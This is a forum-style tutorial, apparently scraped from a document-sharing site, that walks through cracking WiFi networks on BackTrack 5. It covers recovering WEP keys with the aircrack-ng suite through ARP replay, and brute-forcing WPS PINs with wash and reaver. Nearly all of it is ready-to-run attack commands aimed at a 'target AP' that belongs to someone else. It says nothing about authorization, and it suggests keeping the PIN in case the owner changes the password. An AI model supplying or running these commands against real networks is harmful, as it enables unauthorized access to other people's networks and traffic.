Professional Documents
Culture Documents
I'm using BackTrack 5 r3 because the tools that i'm going to use come already installed, but you can use any other Linux Distribution!
Let's Begin.
Open up a terminal and type: Quote:airmon-ng
Spoiler (Click to View)
This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0. Now, we need to set the wireless card in monitor mode, to do
that type: Quote:airmon-ng start wlan1 Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0 After that, type: Quote:airodump-ng mon0
Spoiler (Click to View)
When you press enter, it should show you all the Access Points near you. Copy the BSSID and remember the Channel Number of the target AP. Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.
Spoiler (Click to View)
To speed up this proccess, open up another terminal and type: Quote:aireplay-ng -1 0 -a [BSSID] mon0 After it says it was successfull, type: Quote:aireplay-ng -3 -b [BSSID] mon0
Spoiler (Click to View)
When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type: Quote:aircrack-ng wep-01.cap Now, wait for some minutes and it should give you the PASSWORD! The password is: Quote:EF855844B288E4BB1BA9ADF14D
Spoiler (Click to View)
First, type: Quote:airmon-ng As said earlier, this shows you, your wireless card name. I'll use wlan0 We need to set it the wireless card on monitor mode, so type: Quote:airmon-ng start wlan0 After that, type: Quote:airodump-ng mon0
Spoiler (Click to View)
Now, copy the BSSID of the target AP. Press CONTROL+c to cancel To see the AP's that are vulnerable to WPS attacks, type: Quote:wash -i mon0 If the target AP is vulnerable, it should say: Quote:WPS Locked: No
Spoiler (Click to View)
If the AP is limiting you with a message saying: Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying AND If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type: Quote:reaver --help This will show you the help menu, you can start playing with the options that you have. I usually add the: -c -S -L Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L vv This one works great for me, so keep playing with the options untill it works! When it reaches 100% it should give you some lines, the password is the one after: Quote:WPS PSK: 'PASSWORD HERE' And here it is! You should also, remember the PIN. Quote:WPS PIN: PIN HERE Now, let's say for some reason, the router's owner changed the password for his WiFi. Since you already have the pin, type: Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv
This took me a lot of time to write, so please comment :3 If you have any questions feel free to comment and/or PM ME! Thanks for reading guys!